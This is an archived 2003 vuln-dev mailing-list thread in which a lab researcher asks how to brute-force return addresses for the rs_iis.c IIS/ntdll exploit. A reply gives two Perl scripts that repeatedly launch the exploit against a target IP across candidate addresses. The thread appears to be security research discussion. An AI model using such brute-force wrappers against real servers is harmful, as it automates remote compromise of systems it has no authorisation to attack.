Well, I suppose you mean something like:

#!/usr/bin/perl
# Usage: brute.pl IP
# Walks the return address through 0x0004, 0x0104, ... 0xff04, running rs_iis
# once per candidate and using port 20<x> as its third argument.
$IP = $ARGV[0];                  # target host (was @ARGV[0], a one-element slice)
for ($x = 0; $x < 256; $x++) {   # $x was uninitialised and bumped before use, so the
                                 # last pass produced the three-byte value 0x10004
    $y = sprintf("%02x", $x);    # two hex digits, zero padded
    print "Trying at: $IP 0x${y}04 port 20${x}\n";
    $output = `./rs_iis $IP 80 20${x} 0x${y}04`;
    print "$output\n";
}

You can run it with "brute.pl IP".

You could run it with all possible 65536 possibilities, but that's probably overkill.

#!/usr/bin/perl
# Usage: brute.pl IP
# Full sweep: every return address from 0x0000 to 0xffff, 65536 rs_iis runs.
$IP = $ARGV[0];
for ($x = 0; $x < 65536; $x++) {
    $y = sprintf("%04x", $x);    # four hex digits, zero padded
    $output = `./rs_iis $IP 80 12345 0x${y}`;
    print "$output\n";
}

maarten

----- Original Message -----
From: "Jeremy Junginger" <jjat_private>
To: <vuln-devat_private>
Sent: Monday, March 31, 2003 5:14 PM
Subject: Generating Hex Numbers to brute force rs_iis.c

Hey guys,

In playing with rs_iis.c (ntdll exploit) in our lab, I've been looking for ways to brute force the return address. I know there's been a shell script (rs_brute.sh) released that already does this, but since I've been playing with PERL lately (and since this shell script did not exist when I began playing with the exploit), I thought I'd take a whack at producing the RET addresses (0x0000-0xffff) in a PERL script. I just wanted to get your input and see if there is an easier way to do this (using PERL, of course). Basically, the goal is as follows:

1) generate Hex Numbers from 0x0000 to 0xffff in the following pattern (0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff)
2) pass the output to rs_iis via system() command?

So far, I can generate the output and print it to stdout. Any tips on getting the script to run rs_iis once with each address produced by the script? Also, is there a way to produce this output without creating an array like this?

#!/usr/bin/perl -w
# Nibble lookup table: index 0..15 -> hex digit
@HexD = ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
for ($i = 0; $i <= 255; $i += 1) {
    # high nibble then low nibble, emitted twice to give 0000, 0101, ... ffff
    # (was printf with an unused $i argument, which newer perls warn about)
    print "$HexD[int($i / 16)]$HexD[$i % 16]";
    print "$HexD[int($i / 16)]$HexD[$i % 16]\n";
}

Many thanks,
-Jeremy
This archive was generated by hypermail 2b30 : Thu Apr 03 2003 - 09:48:36 PST